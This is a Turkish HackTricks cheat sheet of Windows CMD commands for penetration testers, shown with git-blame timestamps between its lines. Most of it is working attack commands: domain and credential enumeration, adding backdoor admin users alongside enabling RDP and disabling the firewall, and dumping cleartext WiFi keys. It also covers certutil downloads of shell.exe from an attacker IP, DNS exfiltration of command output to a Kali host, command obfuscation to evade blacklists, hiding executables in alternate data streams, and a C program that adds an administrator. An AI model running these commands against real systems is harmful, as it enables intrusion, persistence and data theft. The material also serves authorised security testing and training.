2024-07-18 22:12:31 +00:00
# Temel Win CMD Pentesterlar için
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Eğitim AWS Kı rmı zı Takı m Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Eğitim GCP Kı rmı zı Takı m Uzmanı (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-18 22:12:31 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 22:12:31 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
2024-11-09 13:57:37 +00:00
* **Bize katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking ipuçları nı paylaşı n,** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR göndererek.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:12:31 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-11-09 13:28:32 +00:00
< figure > < img src = "/.gitbook/assets/pentest-tools.svg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-11-09 13:57:37 +00:00
**Web uygulamaları nı z, ağı nı z ve bulutunuz hakkı nda bir hacker perspektifi edinin**
2024-11-09 13:28:32 +00:00
**Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açı kları nı bulun ve raporlayı n.** Saldı rı yüzeyini haritalamak, ayrı calı kları artı rmanı za izin veren güvenlik sorunları nı bulmak ve temel kanı tları toplamak için otomatik istismarları kullanmak için 20'den fazla özel aracı mı zı kullanı n, sı kı çalı şmanı zı ikna edici raporlara dönüştürün.
{% embed url="https://pentest-tools.com/?utm_term=jul2024& utm_medium=link& utm_source=hacktricks& utm_campaign=spons" %}
2024-02-10 18:14:16 +00:00
## Sistem bilgisi
2020-07-15 15:43:14 +00:00
2024-07-18 22:12:31 +00:00
### Sürüm ve Yamanı n bilgileri
2020-07-15 15:43:14 +00:00
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
2022-10-05 00:11:28 +00:00
wmic computersystem LIST full #Get PC info
2020-07-15 15:43:14 +00:00
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
2022-10-05 00:11:28 +00:00
wmic qfe list brief #Updates
2020-07-15 15:43:14 +00:00
hostname
2022-10-05 00:11:28 +00:00
2020-07-15 15:43:14 +00:00
DRIVERQUERY #3rd party driver vulnerable?
```
2024-02-10 18:14:16 +00:00
### Ortam
2024-04-07 03:13:19 +00:00
```bash
set #List all environment variables
2024-02-10 18:14:16 +00:00
```
2024-07-18 22:12:31 +00:00
Bazı çevresel değişkenleri vurgulamak için:
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
* **COMPUTERNAME**: Bilgisayarı n adı
* **TEMP/TMP:** Geçici klasör
* **USERNAME:** Kullanı cı adı nı z
* **HOMEPATH/USERPROFILE:** Ana dizin
* **windir:** C:\Windows
2024-07-18 22:12:31 +00:00
* **OS**: Windows OS
2024-11-09 13:57:37 +00:00
* **LOGONSERVER**: Etki alanı denetleyicisinin adı
* **USERDNSDOMAIN**: DNS ile kullanı lacak etki alanı adı
* **USERDOMAIN**: Etki alanı nı n adı
2024-04-07 03:13:19 +00:00
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
2024-02-10 18:14:16 +00:00
```
2024-11-09 13:57:37 +00:00
### Montajlı diskler
2024-04-07 03:13:19 +00:00
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
2024-02-10 18:14:16 +00:00
```
2024-07-18 22:12:31 +00:00
### [Defender](authentication-credentials-uac-and-efs/#defender)
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
### Geri Dönüşüm Kutusu
```bash
dir C:\$Recycle.Bin /s /b
2024-02-10 18:14:16 +00:00
```
2024-11-09 13:57:37 +00:00
### Süreçler, Hizmetler & Yazı lı mlar
2024-04-07 03:13:19 +00:00
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
2024-02-10 18:14:16 +00:00
```
2024-07-18 22:12:31 +00:00
## Alan bilgisi
2024-04-07 03:13:19 +00:00
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user < ACCOUNT_NAME > /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:< DOMAIN > #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
2024-02-10 18:14:16 +00:00
```
2024-04-07 03:13:19 +00:00
### Günlükler ve Olaylar
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
2024-02-10 18:14:16 +00:00
```
2024-04-07 03:13:19 +00:00
## Kullanı cı lar ve Gruplar
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
### Kullanı cı lar
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
# Other users looged
qwinsta #Anyone else logged in?
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:13:19 +00:00
### Gruplar
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
#Domain
net group /domain #Info about domain groups
net group /domain < domain_group_name > #Users that belongs to the group
2022-05-17 09:34:10 +00:00
```
2024-07-18 22:12:31 +00:00
### Oturumları listele
2020-08-17 14:38:36 +00:00
```
2024-04-07 03:13:19 +00:00
qwinsta
klist sessions
2022-05-17 09:34:10 +00:00
```
2024-04-07 03:13:19 +00:00
### Şifre Politikası
2024-02-10 18:14:16 +00:00
```
2024-04-07 03:13:19 +00:00
net accounts
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:13:19 +00:00
### Kimlik Bilgileri
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
2024-02-10 18:14:16 +00:00
```
2024-07-18 22:12:31 +00:00
### Kullanı cı larla Süreklilik
2024-04-07 03:13:19 +00:00
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:13:19 +00:00
## Ağ
2020-07-15 15:43:14 +00:00
2024-07-18 22:12:31 +00:00
### Arayüzler, Yollar, Portlar, Ana Bilgisayarlar ve DNS Önbelleği
2024-04-07 03:13:19 +00:00
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
2024-02-10 18:14:16 +00:00
```
2024-04-07 03:13:19 +00:00
### Güvenlik Duvarı
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
2022-10-05 00:11:28 +00:00
2024-04-07 03:13:19 +00:00
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
2024-02-10 18:14:16 +00:00
2024-04-07 03:13:19 +00:00
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:13:19 +00:00
### Paylaşı mlar
2020-07-15 15:43:14 +00:00
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
2024-02-10 18:14:16 +00:00
```
2024-04-07 03:13:19 +00:00
### Wifi
2020-07-15 15:43:14 +00:00
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile < SSID > key=clear #Get Cleartext Pass
```
2024-04-07 03:13:19 +00:00
### SNMP
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
2024-02-10 18:14:16 +00:00
### Ağ Arayüzleri
2020-08-17 14:38:36 +00:00
```bash
ipconfig /all
```
2024-02-10 18:14:16 +00:00
### ARP tablosu
2020-08-17 14:38:36 +00:00
```bash
arp -A
```
2024-07-18 22:12:31 +00:00
## İndir
2020-09-05 18:55:40 +00:00
Bitsadmin.exe
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
2024-07-18 22:12:31 +00:00
CertReq.exe
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
2024-04-07 03:13:19 +00:00
Certutil.exe
```
2020-09-05 18:55:40 +00:00
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
2024-07-18 22:12:31 +00:00
**`Download` için çok daha fazlası nı bulmak için** [**https://lolbas-project.github.io** ](https://lolbas-project.github.io/ )
2020-09-05 18:55:40 +00:00
2024-02-10 18:14:16 +00:00
## Çeşitli
2020-07-15 15:43:14 +00:00
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type < file > #Cat file
2020-09-07 11:12:11 +00:00
2020-07-15 15:43:14 +00:00
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
2021-03-18 23:05:52 +00:00
runas /netonly /user:< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2020-07-15 15:43:14 +00:00
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls < FILE_PATH > /t /e /p < USERNAME > :F
icacls < FILE_PATH > /e /r < USERNAME > #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
2022-08-13 13:54:19 +00:00
# Get error messages from code
net helpmsg 32 #32 is the code in that case
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:12:31 +00:00
### Karakter Siyah Listelemeyi Atlatma
2022-10-02 21:44:11 +00:00
```bash
2022-10-02 22:00:14 +00:00
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
2024-07-18 22:12:31 +00:00
Obfuscate edilmiş bir CMD satı rı oluşturur
2022-10-02 22:00:14 +00:00
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
2022-10-02 21:44:11 +00:00
```
2024-02-10 18:14:16 +00:00
### Dinleme adresi ACL'leri
2022-10-02 21:44:11 +00:00
2024-07-18 22:12:31 +00:00
Yönetici olmadan [http://+:80/Temporary\_Listen\_Addresses/ ](http://+/Temporary\_Listen\_Addresses/ ) adresinde dinleyebilirsiniz.
2020-07-15 15:43:14 +00:00
```bash
netsh http show urlacl
```
2024-07-18 22:12:31 +00:00
### Manuel DNS shell
2020-07-15 15:43:14 +00:00
2024-07-18 22:12:31 +00:00
**Saldı rgan** (Kali) bu 2 seçenekten birini kullanmalı dı r:
2020-07-15 15:43:14 +00:00
```bash
sudo responder -I < iface > #Active
2020-09-07 11:12:11 +00:00
sudo tcpdump -i < iface > -A proto udp and dst port 53 and dst ip < KALI_IP > #Passive
2020-07-15 15:43:14 +00:00
```
2024-04-07 03:13:19 +00:00
#### Kurban
2024-04-06 19:40:41 +00:00
2024-11-09 13:28:32 +00:00
**`for /f tokens`** tekniği: Bu, komutları çalı ştı rmamı za, her satı rı n ilk X kelimesini almamı za ve bunları sunucumuza DNS üzerinden göndermemize olanak tanı r.
2024-02-08 03:08:28 +00:00
```bash
2020-07-15 15:43:14 +00:00
for /f %a in ('whoami') do nslookup %a < IP_kali > #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a < IP_kali > #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c < IP_kali > #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c < IP_kali > #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c < IP_kali > #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali > #Same as last one
```
2024-07-18 22:12:31 +00:00
Çı ktı yı **yönlendirebilir** ve ardı ndan **okuyabilirsiniz** .
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali >
```
2024-07-18 22:12:31 +00:00
## C kodundan CMD çağı rma
2020-07-15 15:43:14 +00:00
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
2024-02-10 18:14:16 +00:00
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
2020-07-15 15:43:14 +00:00
}
```
2024-07-18 22:12:31 +00:00
## Alternatif Veri Akı şları Hile Sayfası (ADS/Alternatif Veri Akı şı )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**Örnekler** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f** ](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f )** adresinden alı nmı ştı r. Orada daha birçok örnek var!**
2020-07-15 15:43:14 +00:00
```bash
2024-02-05 02:29:11 +00:00
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
2020-07-15 15:43:14 +00:00
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
2024-02-05 02:29:11 +00:00
# Download a script directly into an ADS
2020-07-15 15:43:14 +00:00
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
2024-02-05 02:29:11 +00:00
### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe < c: \path \to \file >
2020-07-15 15:43:14 +00:00
2024-02-05 02:29:11 +00:00
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
2020-07-15 15:43:14 +00:00
2024-02-05 02:29:11 +00:00
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
2020-07-15 15:43:14 +00:00
powershell -ep bypass - < c: \temp:ttt
```
2024-11-09 13:28:32 +00:00
< figure > < img src = "/.gitbook/assets/pentest-tools.svg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-11-09 13:57:37 +00:00
**Web uygulamaları nı z, ağı nı z ve bulutunuz hakkı nda bir hacker perspektifi edinin**
2024-11-09 13:28:32 +00:00
**Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açı kları nı bulun ve raporlayı n.** Saldı rı yüzeyini haritalamak, ayrı calı kları artı rmanı za izin veren güvenlik sorunları nı bulmak ve temel kanı tları toplamak için otomatik istismarları kullanmak için 20'den fazla özel aracı mı zı kullanı n, böylece sı kı çalı şmanı zı ikna edici raporlara dönüştürebilirsiniz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024& utm_medium=link& utm_source=hacktricks& utm_campaign=spons" %}
2024-07-18 22:12:31 +00:00
{% hint style="success" %}
2024-11-09 13:28:32 +00:00
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-07-18 22:12:31 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-07-18 22:12:31 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 22:12:31 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
2024-11-09 13:57:37 +00:00
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n ya da **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** bizi takip edin.**
2024-07-18 22:12:31 +00:00
* **Hacking ipuçları nı paylaşmak için** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR gönderin.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:12:31 +00:00
{% endhint %}